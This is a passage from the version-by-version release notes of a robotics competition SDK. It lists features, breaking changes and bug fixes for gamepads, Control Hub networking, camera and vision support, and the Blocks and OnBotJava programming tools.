block, the sockets for those parameters are automatically filled in. Parameters declared as char or java.lang.Character will accept any block that returns text and will only use the first character in the text. Parameters declared as boolean or java.lang.Boolean will accept any block that returns boolean. Parameters declared as byte, java.lang.Byte, short, java.lang.Short, int, java.lang.Integer, long, or java.lang.Long, will accept any block that returns a number and will round that value to the nearest whole number. Parameters declared as float, java.lang.Float, double, java.lang.Double will accept any block that returns a number. Adds telemetry API method for setting display format Classic Monospace HTML (certain tags only) Adds blocks support for switching cameras. Adds Blocks support for TensorFlow Object Detection with a custom model. Adds support for uploading a custom TensorFlow Object Detection model in the Manage page, which is especially useful for Blocks and OnBotJava users. Shows new Control Hub blink codes when the WiFi band is switched using the Control Hub's button (only possible on Control Hub OS 1.1.2) Adds new warnings which can be disabled in the Advanced RC Settings Mismatched app versions warning Unnecessary 2.4 GHz WiFi usage warning REV Hub is running outdated firmware (older than version 1.8.2) Adds support for Sony PS4 gamepad, and reworks how gamepads work on the Driver Station Removes preference which sets gamepad type based on driver position. Replaced with menu which allows specifying type for gamepads with unknown VID and PID Attempts to auto-detect gamepad type based on USB VID and PID If gamepad VID and PID is not known, use type specified by user for that VID and PID If gamepad VID and PID is not known AND the user has not specified a type for that VID and PID, an educated guess is made about how to map the gamepad Driver Station will now attempt to automatically recover from a gamepad disconnecting, and re-assign it to the position it was assigned to when it dropped If only one gamepad is assigned and it drops: it can be recovered If two gamepads are assigned, and have different VID/PID signatures, and only one drops: it will be recovered If two gamepads are assigned, and have different VID/PID signatures, and BOTH drop: both will be recovered If two gamepads are assigned, and have the same VID/PID signatures, and only one drops: it will be recovered If two gamepads are assigned, and have the same VID/PID signatures, and BOTH drop: neither will be recovered, because of the ambiguity of the gamepads when they re-appear on the USB bus. There is currently one known edge case: if there are two gamepads with the same VID/PID signature plugged in, but only one is assigned, and they BOTH drop, it's a 50-50 chance of which one will be chosen for automatic recovery to the assigned position: it is determined by whichever one is re-enumerated first by the USB bus controller. Adds landscape user interface to Driver Station New feature: practice timer with audio cues New feature (Control Hub only): wireless network connection strength indicator (0-5 bars) New feature (Control Hub only): tapping on the ping/channel display will switch to an alternate display showing radio RX dBm and link speed (tap again to switch back) The layout will NOT autorotate. You can switch the layout from the Driver Station's settings menu. Breaking changes Removes support for Android versions 4.4 through 5.1 (KitKat and Lollipop). The minSdkVersion is now 23. Removes the deprecated LinearOpMode methods waitOneFullHardwareCycle() and waitForNextHardwareCycle() Enhancements Handles RS485 address of Control Hub automatically The Control Hub is automatically given a reserved address Existing configuration files will continue to work All addresses in the range of 1-10 are still available for Expansion Hubs The Control Hub light will now normally be solid green, without blinking to indicate the address The Control Hub will not be shown on the Expansion Hub Address Change settings page Improves REV Hub firmware updater The user can now choose between all available firmware update files Version 1.8.2 of the REV Hub firmware is bundled into the Robot Controller app. Text was added to clarify that Expansion Hubs can only be updated via USB. Firmware update speed was reduced to improve reliability Allows REV Hub firmware to be updated directly from the Manage webpage Improves log viewer on Robot Controller Horizontal scrolling support (no longer word wrapped) Supports pinch-to-zoom Uses a monospaced font Error messages are highlighted New color scheme Attempts to force-stop a runaway/stuck OpMode without restarting the entire app Not all types of runaway conditions are stoppable, but if the user code attempts to talk to hardware during the runaway, the system should be able to capture it. Makes various tweaks to the Self Inspect screen Renames "OS version" entry to "Android version" Renames "WiFi Direct Name" to "WiFi Name" Adds Control Hub OS version, when viewing the report of a Control Hub Hides the airplane mode entry, when viewing the report of a Control Hub Removes check for ZTE Speed Channel Changer Shows firmware version for all Expansion and Control Hubs Reworks network settings portion of Manage page All network settings are now applied with a single click The WiFi Direct channel of phone-based Robot Controllers can now be changed from the Manage page WiFi channels are filtered by band (2.4 vs 5 GHz) and whether they overlap with other channels The current WiFi channel is pre-selected on phone-based Robot Controllers, and Control Hubs running OS 1.1.2 or later. On Control Hubs running OS 1.1.2 or later, you can choose to have the system automatically select a channel on the 5 GHz band Improves OnBotJava New light and dark themes replace the old themes (chaos, github, chrome,...) the new default theme is light and will be used when you first update to this version OnBotJava now has a tabbed editor Read-only offline mode Improves function of "exit" menu item on Robot Controller and Driver Station Now guaranteed to be fully stopped and unloaded from memory Shows a warning message if a LinearOpMode exists prematurely due to failure to monitor for the start condition Improves error message shown when the Driver Station and Robot Controller are incompatible with each other Driver Station OpMode Control Panel now disabled while a Restart Robot is in progress Disables advanced settings related to WiFi direct when the Robot Controller is a Control Hub. Tint phone battery icons on Driver Station when low/critical. Uses names "Control Hub Portal" and "Control Hub" (when appropriate) in new configuration files Improve I2C read performance Very large improvement on Control Hub; up to ~2x faster with small (e.g. 6 byte) reads Not as apparent on Expansion Hubs connected to a phone Update/refresh build infrastructure Update to 'androidx' support library from 'com.android.support:appcompat', which is end-of-life Update targetSdkVersion and compileSdkVersion to 28 Update Android Studio's Android plugin to latest Fix reported build timestamp in 'About' screen Add sample illustrating manual webcam use: ConceptWebcam Bug fixes Fixes SkyStone issue #248 Fixes SkyStone issue #232 and modifies bulk caching semantics to allow for cache-preserving MANUAL/AUTO transitions. Improves performance when REV 2M distance sensor is unplugged Improves readability of Toast messages on certain devices Allows a Driver Station to connect to a Robot Controller after another has disconnected Improves generation of fake serial numbers for UVC cameras which do not provide a real serial number Previously some devices would assign such cameras a serial of 0:0 and fail to open and start streaming Fixes ftc_app issue #638. Fixes a slew of bugs with the Vuforia camera monitor including: Fixes bug where preview could be displayed with a wonky aspect ratio Fixes bug where preview could be cut off in landscape Fixes bug where preview got totally messed up when rotating phone Fixes bug where crosshair could drift off target when using webcams Fixes issue in UVC driver on some devices (ftc_app 681) if streaming was started/stopped multiple times in a row Issue manifested as kernel panic on devices which do not have this kernel patch. On affected devices which do have the patch, the issue was manifest as simply a failure to start streaming. The Tech Team believes that the root cause of the issue is a bug in the Linux kernel XHCI driver. A workaround was implemented in the SDK UVC driver. Fixes bug in UVC driver where often half the frames from the camera would be dropped (e.g. only 15FPS delivered during a streaming session configured for 30FPS). Fixes issue where TensorFlow Object Detection would show results whose confidence was lower than the minimum confidence parameter. Fixes a potential exploitation issue of CVE-2019-11358 in OnBotJava Fixes changing the address of an Expansion Hub with additional Expansion Hubs connected to it Preserves the Control Hub's network connection when "Restart Robot" is selected Fixes issue where device scans would fail while the Robot was restarting Fix RenderScript usage Use androidx.renderscript variant: increased compatibility Use RenderScript in Java mode, not native: simplifies build Fixes webcam-frame-to-bitmap conversion problem: alpha channel wasn't being initialized, only R, G, & B Fixes possible arithmetic overflow in Deadline Fixes deadlock in Vuforia webcam support which could cause 5-second delays when stopping OpMode Version 5.4 (20200108-101156) Fixes SkyStone issue #88 Adds an inspection item that notes when a robot controller (Control Hub) is using the factory default password. Fixes SkyStone issue #61 Fixes SkyStone issue #142 Fixes ftc_app issue #417 by adding more current and voltage monitoring capabilities for REV Hubs. Fixes a crash sometimes caused by OnBotJava activity Improves OnBotJava autosave functionality ftc_app #738 Fixes system responsiveness issue when an Expansion Hub is disconnected Fixes issue where IMU initialization could prevent Op Modes from stopping Fixes issue where AndroidTextToSpeech.speak() would fail if it was called too early Adds telemetry.speak() methods and blocks, which cause the Driver Station (if also updated) to speak text Adds and improves Expansion Hub-related warnings Improves Expansion Hub low battery warning Displays the warning immediately after the hub reports it Specifies whether the condition is current or occurred temporarily during an OpMode run Displays which hubs reported low battery Displays warning when hub loses and regains power during an OpMode run Fixes the hub's LED pattern after this condition Displays warning when Expansion Hub is not responding to commands Specifies whether the condition is current or occurred temporarily during an OpMode run Clarifies warning when Expansion Hub is not present at startup Specifies that this condition requires a Robot Restart before the hub can be used. The hub light will now accurately reflect this state Improves logging and reduces log spam during these conditions Syncs the Control Hub time and timezone to a connected web browser programming the robot, if a Driver Station is not available. Adds bulk read functionality for REV Hubs A bulk caching mode must be set at the Hub level with LynxModule#setBulkCachingMode(). This applies to all relevant SDK hardware classes that reference that Hub. The following following Hub bulk caching modes are available: BulkCachingMode.OFF (default): All hardware calls operate as usual. Bulk data can read through LynxModule#getBulkData() and processed manually. BulkCachingMode.AUTO: Applicable hardware calls are served from a bulk read cache that is cleared/refreshed automatically to ensure identical commands don't hit the same cache. The cache can also be cleared manually with LynxModule#clearBulkCache(), although this is not recommended. (advanced users) BulkCachingMode.MANUAL: Same as BulkCachingMode.AUTO except the cache is never cleared automatically. To avoid getting stale data, the cache must be manually cleared at the beginning of each loop body or as the user deems appropriate. Removes PIDF Annotation values added in Rev 5.3 (to AndyMark, goBILDA and TETRIX motor configurations). The new motor types will still be available but their Default control behavior will revert back to Rev 5.2 Adds new ConceptMotorBulkRead sample Opmode to demonstrate and compare Motor Bulk-Read modes for reducing I/O latencies. Version 5.3 (20191004-112306) Fixes external USB/UVC webcam support Makes various bugfixes and improvements to Blocks page, including but not limited to: Many visual tweaks Browser zoom and window resize behave better Resizing the Java preview pane works better and more consistently across browsers The Java preview pane consistently gets scrollbars when needed The Java preview pane is hidden by default on phones Internet Explorer 11 should work Large dropdown lists display properly on lower res screens Disabled buttons are now visually identifiable as disabled A warning is shown if a user selects a TFOD sample, but their device is not compatible Warning messages in a Blocks op mode are now visible by default. Adds goBILDA 5201 and 5202 motors to Robot Configurator Adds PIDF Annotation values to AndyMark, goBILDA and TETRIX motor configurations. This has the effect of causing the RUN_USING_ENCODERS and RUN_TO_POSITION modes to use PIDF vs PID closed loop control on these motors. This should provide more responsive, yet stable, speed control. PIDF adds Feedforward control to the basic PID control loop. Feedforward is useful when controlling a motor's speed because it "anticipates" how much the control voltage must change to achieve a new speed set-point, rather than requiring the integrated error to change sufficiently. The PIDF values were chosen to provide responsive, yet stable, speed control on a lightly loaded motor. The more heavily a motor is loaded (drag or friction), the more noticable the PIDF improvement will be. Fixes startup crash on Android 10 Fixes ftc_app issue #712 (thanks to FROGbots-4634) Fixes ftc_app issue #542 Allows "A" and lowercase letters when naming device through RC and DS apps. Version 5.2 (20190905-083277) Fixes extra-wide margins on settings activities, and placement of the new configuration button Adds Skystone Vuforia image target data. Includes sample Skystone Vuforia Navigation op modes (Java). Includes sample Skystone Vuforia Navigation op modes (Blocks). Adds TensorFlow inference model (.tflite) for Skystone game elements. Includes sample Skystone TensorFlow op modes (Java). Includes sample Skystone TensorFlow op modes (Blocks). Removes older (season-specific) sample op modes. Includes 64-bit support (to comply with Google Play requirements). Protects against Stuck OpModes when a Restart Robot is requested. (Thanks to FROGbots-4634) (ftc_app issue #709) Blocks related changes: Fixes bug with blocks generated code when hardware device name is a java or javascript reserved word. Shows generated java code for blocks, even when hardware items are missing from the active configuration. Displays warning icon when outdated Vuforia and TensorFlow blocks are used (SkyStone issue #27) Version 5.1 (20190820-222104) Defines default PIDF parameters for the following motors: REV Core Hex Motor REV 20:1 HD Hex Motor REV 40:1 HD Hex Motor Adds back button when running on a device without a system back button (such as a Control Hub) Allows a REV Control Hub to update the firmware on a REV Expansion Hub via USB Fixes SkyStone issue #9 Fixes ftc_app issue #715 Prevents extra DS User clicks by filtering based on current state. Prevents incorrect DS UI state changes when receiving new OpMode list from RC Adds support for REV Color Sensor V3 Adds a manual-refresh DS Camera Stream for remotely viewing RC camera frames. To show the stream on the DS, initialize but do not run a stream-enabled opmode, select the Camera Stream option in the DS menu, and tap the image to refresh. This feature is automatically enabled when using Vuforia or TFOD—no additional RC configuration is required for typical use cases. To hide the stream, select the same menu item again. Note that gamepads are disabled and the selected opmode cannot be started while the stream is open as a safety precaution. To use custom streams, consult the API docs for CameraStreamServer#setSource and CameraStreamSource. Adds many Star Wars sounds to RobotController resources. Added SKYSTONE Sounds Chooser Sample Program. Switches out startup, connect chimes, and error/warning sounds for Star Wars sounds Updates OnBot Java to use a WebSocket for communication with the robot The OnBot Java page no longer has to do a full refresh when a user switches from editing one file to another Known issues: Camera Stream The Vuforia camera stream inherits the issues present in the phone preview (namely ftc_app issue #574). This problem does not affect the TFOD camera stream even though it receives frames from Vuforia. The orientation of the stream frames may not always match the phone preview. For now, these frames may be rotated manually via a custom CameraStreamSource if desired. OnBotJava Browser back button may not always work correctly It's possible for a build to be queued, but not started. The OnBot Java build console will display a warning if this occurs. A user might not realize they are editing a different file if the user inadvertently switches from one file to another since this switch is now seamless. The name of the currently open file is displayed in the browser tab. Version 5.0 (built on 19.06.14) Support for the REV Robotics Control Hub. Adds a Java preview pane to the Blocks editor. Adds a new offline export feature to the Blocks editor. Display wifi channel in Network circle on Driver Station. Adds calibration for Logitech C270 Updates build tooling and target SDK. Compliance with Google's permissions infrastructure (Required after build tooling update). Keep Alives to mitigate the Motorola wifi scanning problem. Telemetry substitute no longer necessary. Improves Vuforia error reporting. Fixes ftctechnh/ftc_app issues 621, 713. Miscellaneous bug fixes and improvements. Version 4.3 (built on 18.10.31) Includes missing TensorFlow-related libraries and files. Version 4.2 (built on 18.10.30) Includes fix to avoid deadlock situation with WatchdogMonitor which could result in USB communication errors. Comm error appeared to require that user disconnect USB cable and restart the Robot Controller app to recover. robotControllerLog.txt would have error messages that included the words "E RobotCore: lynx xmit lock: #### abandoning lock:" Includes fix to correctly list the parent module address for a REV Robotics Expansion Hub in a configuration (.xml) file. Bug in versions 4.0 and 4.1 would incorrect list the address module for a parent REV Robotics device as "1". If the parent module had a higher address value than the daisy-chained module, then this bug would prevent the Robot Controller from communicating with the downstream Expansion Hub. Added requirement for ACCESS_COARSE_LOCATION to allow a Driver Station running Android Oreo to scan for Wi-Fi Direct devices. Added google() repo to build.gradle because aapt2 must be downloaded from the google() repository beginning with version 3.2 of the Android Gradle Plugin. Important Note: Android Studio users will need to be connected to the Internet the first time build the ftc_app project. Internet connectivity is required for the first build so the appropriate files can be downloaded from the Google repository. Users should not need to be connected to the Internet for subsequent builds. This should also fix buid issue where Android Studio would complain that it "Could not find com.android.tools.lint:lint-gradle:26.1.4" (or similar). Added support for REV Spark Mini motor controller as part of the configuration menu for a servo/PWM port on the REV Expansion Hub. Provide examples for playing audio files in an Op Mode. Block Development Tool Changes Includes a fix for a problem with the Velocity blocks that were reported in the FTC Technology forum (Blocks Programming subforum). Change the "Save completed successfully." message to a white color so it will contrast with a green background. Fixed the "Download image" feature so it will work if there are text blocks in the op mode. Introduce support for Google's TensorFlow Lite technology for object detetion for 2018-2019 game. TensorFlow lite can recognize Gold Mineral and Silver Mineral from 2018-2019 game. Example Java and Block op modes are included to show how to determine the relative position of the gold block (left, center, right). Version 4.1 (released on 18.09.24) Changes include: Fix to prevent crash when deprecated configuration annotations are used. Change to allow FTC Robot Controller APK to be auto-updated using FIRST Global Control Hub update scripts. Removed samples for non supported / non legal hardware. Improvements to Telemetry.addData block with "text" socket. Updated Blocks sample op mode list to include Rover Ruckus Vuforia example. Update SDK library version number. Version 4.0 (released on 18.09.12) Changes include: Initial support for UVC compatible cameras If UVC camera has a unique serial number, RC will detect and enumerate by serial number. If UVC camera lacks a unique serial number, RC will only support one camera of that type connected. Calibration settings for a few cameras are included (see TeamCode/src/main/res/xml/teamwebcamcalibrations.xml for details). User can upload calibration files from Program and Manage web interface. UVC cameras seem to draw a fair amount of electrical current from the USB bus. This does not appear to present any problems for the REV Robotics Control Hub. This does seem to create stability problems when using some cameras with an Android phone-based Robot Controller. FTC Tech Team is investigating options to mitigate this issue with the phone-based Robot Controllers. Updated sample Vuforia Navigation and VuMark Op Modes to demonstrate how to use an internal phone-based camera and an external UVC webcam. Support for improved motor control. REV Robotics Expansion Hub firmware 1.8 and greater will support a feed forward mechanism for closed loop motor control. FTC SDK has been modified to support PIDF coefficients (proportional, integral, derivative, and feed forward). FTC Blocks development tool modified to include PIDF programming blocks. Deprecated older PID-related methods and variables. REV's 1.8.x PIDF-related changes provide a more linear and accurate way to control a motor. Wireless Added 5GHz support for wireless channel changing for those devices that support it. Tested with Moto G5 and E4 phones. Also tested with other (currently non-approved) phones such as Samsung Galaxy S8. Improved Expansion Hub firmware update support in Robot Controller app Changes to make the system more robust during the firmware update process (when performed through Robot Controller app). User no longer has to disconnect a downstream daisy-chained Expansion Hub when updating an Expansion Hub's firmware. If user is updating an Expansion Hub's firmware through a USB connection, he/she does not have to disconnect RS485 connection to other Expansion Hubs. The user still must use a USB connection to update an Expansion Hub's firmware. The user cannot update the Expansion Hub firmware for a downstream device that is daisy chained through an RS485 connection. If an Expansion Hub accidentally gets "bricked" the Robot Controller app is now more likely to recognize the Hub when it scans the USB bus. Robot Controller app should be able to detect an Expansion Hub, even if it accidentally was bricked in a previous update attempt. Robot Controller app should be able to install the firmware onto the Hub, even if if accidentally was bricked in a previous update attempt. Resiliency FTC software can detect and enable an FTDI reset feature that is available with REV Robotics v1.8 Expansion Hub firmware and greater. When enabled, the Expansion Hub can detect if it hasn't communicated with the Robot Controller over the FTDI (USB) connection. If the Hub hasn't heard from the Robot Controller in a while, it will reset the FTDI connection. This action helps system recover from some ESD-induced disruptions. Various fixes to improve reliability of FTC software. Blocks Fixed errors with string and list indices in blocks export to java. Support for USB connected UVC webcams. Refactored optimized Blocks Vuforia code to support Rover Ruckus image targets. Added programming blocks to support PIDF (proportional, integral, derivative and feed forward) motor control. Added formatting options (under Telemetry and Miscellaneous categories) so user can set how many decimal places to display a numerical value. Support to play audio files (which are uploaded through Blocks web interface) on Driver Station in addition to the Robot Controller. Fixed bug with Download Image of Blocks feature. Support for REV Robotics Blinkin LED Controller. Support for REV Robotics 2m Distance Sensor. Added support for a REV Touch Sensor (no longer have to configure as a generic digital device). Added blocks for DcMotorEx methods. These are enhanced methods that you can use when supported by the motor controller hardware. The REV Robotics Expansion Hub supports these enhanced methods. Enhanced methods include methods to get/set motor velocity (in encoder pulses per second), get/set PIDF coefficients, etc.. Modest Improvements in Logging Decrease frequency of battery checker voltage statements. Removed non-FTC related log statements (wherever possible). Introduced a "Match Logging" feature. Under "Settings" a user can enable/disable this feature (it's disabled by default). If enabled, user provides a "Match Number" through the Driver Station user interface (top of the screen). The Match Number is used to create a log file specifically with log statements from that particular Op Mode run. Match log files are stored in /sdcard/FIRST/matlogs on the Robot Controller. Once an op mode run is complete, the Match Number is cleared. This is a convenient way to create a separate match log with statements only related to a specific op mode run. New Devices Support for REV Robotics Blinkin LED Controller. Support for REV Robotics 2m Distance Sensor. Added configuration option for REV 20:1 HD Hex Motor. Added support for a REV Touch Sensor (no longer have to configure as a generic digital device). Miscellaneous Fixed some errors in the definitions for acceleration and velocity in our javadoc documentation. Added ability to play audio files on Driver Station When user is configuring an Expansion Hub, the LED on the Expansion Hub will change blink pattern (purple-cyan) to indicate which Hub is currently being configured. Renamed I2cSensorType to I2cDeviceType. Added an external sample Op Mode that demonstrates localization using 2018-2019 (Rover Ruckus presented by QualComm) Vuforia targets. Added an external sample Op Mode that demonstrates how to use the REV Robotics 2m Laser Distance Sensor. Added an external sample Op Mode that demonstrates how to use the REV Robotics Blinkin LED Controller. Re-categorized external Java sample Op Modes to "TeleOp" instead of "Autonomous". Known issues: Initial support for UVC compatible cameras UVC cameras seem to draw significant amount of current from the USB bus. This does not appear to present any problems for the REV Robotics Control Hub. This does seem to create stability problems when using some cameras with an Android phone-based Robot Controller. FTC Tech Team is investigating options to mitigate this issue with the phone-based Robot Controllers. There might be a possible deadlock which causes the RC to become unresponsive when using a UVC webcam with a Nougat Android Robot Controller. Wireless When user selects a wireless channel, this channel does not necessarily persist if the phone is power cycled. Tech Team is hoping to eventually address this issue in a future release. Issue has been present since apps were introduced (i.e., it is not new with the v4.0 release). Wireless channel is not currently displayed for WiFi Direct connections. Miscellaneous The blink indication feature that shows which Expansion Hub is currently being configured does not work for a newly created configuration file. User has to first save a newly created configuration file and then close and re-edit the file in order for blink indicator to work. Version 3.6 (built on 17.12.18) Changes include: Blocks Changes Uses updated Google Blockly software to allow users to edit their op modes on Apple iOS devices (including iPad and iPhone). Improvement in Blocks tool to handle corrupt op mode files. Autonomous op modes should no longer get switched back to tele-op after re-opening them to be edited. The system can now detect type mismatches during runtime and alert the user with a message on the Driver Station. Updated javadoc documentation for setPower() method to reflect correct range of values (-1 to +1). Modified VuforiaLocalizerImpl to allow for user rendering of frames Added a user-overrideable onRenderFrame() method which gets called by the class's renderFrame() method. Version 3.5 (built on 17.10.30) Changes with version 3.5 include: Introduced a fix to prevent random op mode stops, which can occur after the Robot Controller app has been paused and then resumed (for example, when a user temporarily turns off the display of the Robot Controller phone, and then turns the screen back on). Introduced a fix to prevent random op mode stops, which were previously caused by random peer disconnect events on the Driver Station. Fixes issue where log files would be closed on pause of the RC or DS, but not re-opened upon resume. Fixes issue with battery handler (voltage) start/stop race. Fixes issue where Android Studio generated op modes would disappear from available list in certain situations. Fixes problem where OnBot Java would not build on REV Robotics Control Hub. Fixes problem where OnBot Java would not build if the date and time on the Robot Controller device was "rewound" (set to an earlier date/time). Improved error message on OnBot Java that occurs when renaming a file fails. Removed unneeded resources from android.jar binaries used by OnBot Java to reduce final size of Robot Controller app. Added MR_ANALOG_TOUCH_SENSOR block to Blocks Programming Tool. Version 3.4 (built on 17.09.06) Changes with version 3.4 include: Added telemetry.update() statement for BlankLinearOpMode template. Renamed sample Block op modes to be more consistent with Java samples. Added some additional sample Block op modes. Reworded OnBot Java readme slightly. Version 3.3 (built on 17.09.04) This version of the software includes improves for the FTC Blocks Programming Tool and the OnBot Java Programming Tool. Changes with verion 3.3 include: Android Studio ftc_app project has been updated to use Gradle Plugin 2.3.3. Android Studio ftc_app project is already using gradle 3.5 distribution. Robot Controller log has been renamed to /sdcard/RobotControllerLog.txt (note that this change was actually introduced w/ v3.2). Improvements in I2C reliability. Optimized I2C read for REV Expansion Hub, with v1.7 firmware or greater. Updated all external/samples (available through OnBot and in Android project folder). Vuforia Added support for VuMarks that will be used for the 2017-2018 season game. Blocks Update to latest Google Blockly release. Sample op modes can be selected as a template when creating new op mode. Fixed bug where the blocks would disappear temporarily when mouse button is held down. Added blocks for Range.clip and Range.scale. User can now disable/enable Block op modes. Fix to prevent occasional Blocks deadlock. OnBot Java Significant improvements with autocomplete function for OnBot Java editor. Sample op modes can be selected as a template when creating new op mode. Fixes and changes to complete hardware setup feature. Updated (and more useful) onBot welcome message. Known issues: Android Studio After updating to the new v3.3 Android Studio project folder, if you get error messages indicating "InvalidVirtualFileAccessException" then you might need to do a File->Invalidate Caches / Restart to clear the error. OnBot Java Sometimes when you push the build button to build all op modes, the RC returns an error message that the build failed. If you press the build button a second time, the build typically suceeds. Version 3.2 (built on 17.08.02) This version of the software introduces the "OnBot Java" Development Tool. Similar to the FTC Blocks Development Tool, the FTC OnBot Java Development Tool allows a user to create, edit and build op modes dynamically using only a Javascript-enabled web browser. The OnBot Java Development Tool is an integrated development environment (IDE) that is served up by the Robot Controller. Op modes are created and edited using a Javascript-enabled browser (Google Chromse is recommended). Op modes are saved on the Robot Controller Android device directly. The OnBot Java Development Tool provides a Java programming environment that does NOT need Android Studio. Changes with version 3.2 include: Enhanced web-based development tools Introduction of OnBot Java Development Tool. Web-based programming and management features are "always on" (user no longer needs to put Robot Controller into programming mode). Web-based management interface (where user can change Robot Controller name and also easily download Robot Controller log file). OnBot Java, Blocks and Management features available from web based interface. Blocks Programming Development Tool: Changed "LynxI2cColorRangeSensor" block to "REV Color/range sensor" block. Fixed tooltip for ColorSensor.isLightOn block. Added blocks for ColorSensor.getNormalizedColors and LynxI2cColorRangeSensor.getNormalizedColors. Added example op modes for digital touch sensor and REV Robotics Color Distance sensor. User selectable color themes. Includes many minor enhancements and fixes (too numerous to list). Known issues: Auto complete function is incomplete and does not support the following (for now): Access via this keyword Access via super keyword Members of the super cloass, not overridden by the class Any methods provided in the current class Inner classes Can't handle casted objects Any objects coming from an parenthetically enclosed expression Version 3.10 (built on 17.05.09) This version of the software provides support for the REV Robotics Expansion Hub. This version also includes improvements in the USB communication layer in an effort to enhance system resiliency. If you were using a 2.x version of the software previously, updating to version 3.1 requires that you also update your Driver Station software in addition to updating the Robot Controller software. Also note that in version 3.10 software, the setMaxSpeed and getMaxSpeed methods are no longer available (not deprecated, they have been removed from the SDK). Also note that the the new 3.x software incorporates motor profiles that a user can select as he/she configures the robot. Changes include: Blocks changes Added VuforiaTrackableDefaultListener.getPose and Vuforia.trackPose blocks. Added optimized blocks support for Vuforia extended tracking. Added atan2 block to the math category. Added useCompetitionFieldTargetLocations parameter to Vuforia.initialize block. If set to false, the target locations are placed at (0,0,0) with target orientation as specified in https://github.com/gearsincorg/FTCVuforiaDemo/blob/master/Robot_Navigation.java tutorial op mode. Incorporates additional improvements to USB comm layer to improve system resiliency (to recover from a greater number of communication disruptions). Additional Notes Regarding Version 3.00 (built on 17.04.13) In addition to the release changes listed below (see section labeled "Version 3.00 (built on 17.04.013)"), version 3.00 has the following important changes: Version 3.00 software uses a new version of the FTC Robocol (robot protocol). If you upgrade to v3.0 on the Robot Controller and/or Android Studio side, you must also upgrade the Driver Station software to match the new Robocol. Version 3.00 software removes the setMaxSpeed and getMaxSpeed methods from the DcMotor class. If you have an op mode that formerly used these methods, you will need to remove the references/calls to these methods. Instead, v3.0 provides the max speed information through the use of motor profiles that are selected by the user during robot configuration. Version 3.00 software currently does not have a mechanism to disable extra i2c sensors. We hope to re-introduce this function with a release in the near future. Version 3.00 (built on 17.04.13) *** Use this version of the software at YOUR OWN RISK!!! *** This software is being released as an "alpha" version. Use this version at your own risk! This pre-release software contains SIGNIFICANT changes, including changes to the Wi-Fi Direct pairing mechanism, rewrites of the I2C sensor classes, changes to the USB/FTDI layer, and the introduction of support for the REV Robotics Expansion Hub and the REV Robotics color-range-light sensor. These changes were implemented to improve the reliability and resiliency of the FTC control system. Please note, however, that version 3.00 is considered "alpha" code. This code is being released so that the FIRST community will have an opportunity to test the new REV Expansion Hub electronics module when it becomes available in May. The developers do not recommend using this code for critical applications (i.e., competition use). *** Use this version of the software at YOUR OWN RISK!!! *** Changes include: Major rework of sensor-related infrastructure. Includes rewriting sensor classes to implement synchronous I2C communication. Fix to reset Autonomous timer back to 30 seconds. Implementation of specific motor profiles for approved 12V motors (includes Tetrix, AndyMark, Matrix and REV models). Modest improvements to enhance Wi-Fi P2P pairing. Fixes telemetry log addition race. Publishes all the sources (not just a select few). Includes Block programming improvements Addition of optimized Vuforia blocks. Auto scrollbar to projects and sounds pages. Fixed blocks paste bug. Blocks execute after while-opModeIsActive loop (to allow for cleanup before exiting op mode). Added gyro integratedZValue block. Fixes bug with projects page for Firefox browser. Added IsSpeaking block to AndroidTextToSpeech. Implements support for the REV Robotics Expansion Hub Implements support for integral REV IMU (physically installed on I2C bus 0, uses same Bosch BNO055 9 axis absolute orientation sensor as Adafruit 9DOF abs orientation sensor). - Implements support for REV color/range/light sensor. Provides support to update Expansion Hub firmware through FTC SDK. Detects REV firmware version and records in log file. Includes support for REV Control Hub (note that the REV Control Hub is not yet approved for FTC use). Implements FTC Blocks programming support for REV Expansion Hub and sensor hardware. Detects and alerts when I2C device disconnect. Version 2.62 (built on 17.01.07) Added null pointer check before calling modeToByte() in finishModeSwitchIfNecessary method for ModernRoboticsUsbDcMotorController class. Changes to enhance Modern Robotics USB protocol robustness. Version 2.61 (released on 16.12.19) Blocks Programming mode changes: Fix to correct issue when an exception was thrown because an OpticalDistanceSensor object appears twice in the hardware map (the second time as a LightSensor). Version 2.6 (released on 16.12.16) Fixes for Gyro class: Improve (decrease) sensor refresh latency. fix isCalibrating issues. Blocks Programming mode changes: Blocks now ignores a device in the configuration xml if the name is empty. Other devices work in configuration work fine. Version 2.5 (internal release on released on 16.12.13) Blocks Programming mode changes: Added blocks support for AdafruitBNO055IMU. Added Download Op Mode button to FtcBocks.html. Added support for copying blocks in one OpMode and pasting them in an other OpMode. The clipboard content is stored on the phone, so the programming mode server must be running. Modified Utilities section of the toolbox. In Programming Mode, display information about the active connections. Fixed paste location when workspace has been scrolled. Added blocks support for the android Accelerometer. Fixed issue where Blocks Upload Op Mode truncated name at first dot. Added blocks support for Android SoundPool. Added type safety to blocks for Acceleration. Added type safety to blocks for AdafruitBNO055IMU.Parameters. Added type safety to blocks for AnalogInput. Added type safety to blocks for AngularVelocity. Added type safety to blocks for Color. Added type safety to blocks for ColorSensor. Added type safety to blocks for CompassSensor. Added type safety to blocks for CRServo. Added type safety to blocks for DigitalChannel. Added type safety to blocks for ElapsedTime. Added type safety to blocks for Gamepad. Added type safety to blocks for GyroSensor. Added type safety to blocks for IrSeekerSensor. Added type safety to blocks for LED. Added type safety to blocks for LightSensor. Added type safety to blocks for LinearOpMode. Added type safety to blocks for MagneticFlux. Added type safety to blocks for MatrixF. Added type safety to blocks for MrI2cCompassSensor. Added type safety to blocks for MrI2cRangeSensor. Added type safety to blocks for OpticalDistanceSensor. Added type safety to blocks for Orientation. Added type safety to blocks for Position. Added type safety to blocks for Quaternion. Added type safety to blocks for Servo. Added type safety to blocks for ServoController. Added type safety to blocks for Telemetry. Added type safety to blocks for Temperature. Added type safety to blocks for TouchSensor. Added type safety to blocks for UltrasonicSensor. Added type safety to blocks for VectorF. Added type safety to blocks for Velocity. Added type safety to blocks for VoltageSensor. Added type safety to blocks for VuforiaLocalizer.Parameters. Added type safety to blocks for VuforiaTrackable. Added type safety to blocks for VuforiaTrackables. Added type safety to blocks for enums in AdafruitBNO055IMU.Parameters. Added type safety to blocks for AndroidAccelerometer, AndroidGyroscope, AndroidOrientation, and AndroidTextToSpeech. Version 2.4 (released on 16.11.13) Fix to avoid crashing for nonexistent resources. Blocks Programming mode changes: Added blocks to support OpenGLMatrix, MatrixF, and VectorF. Added blocks to support AngleUnit, AxesOrder, AxesReference, CameraDirection, CameraMonitorFeedback, DistanceUnit, and TempUnit. Added blocks to support Acceleration. Added blocks to support LinearOpMode.getRuntime. Added blocks to support MagneticFlux and Position. Fixed typos. Made blocks for ElapsedTime more consistent with other objects. Added blocks to support Quaternion, Velocity, Orientation, AngularVelocity. Added blocks to support VuforiaTrackables, VuforiaTrackable, VuforiaLocalizer, VuforiaTrackableDefaultListener. 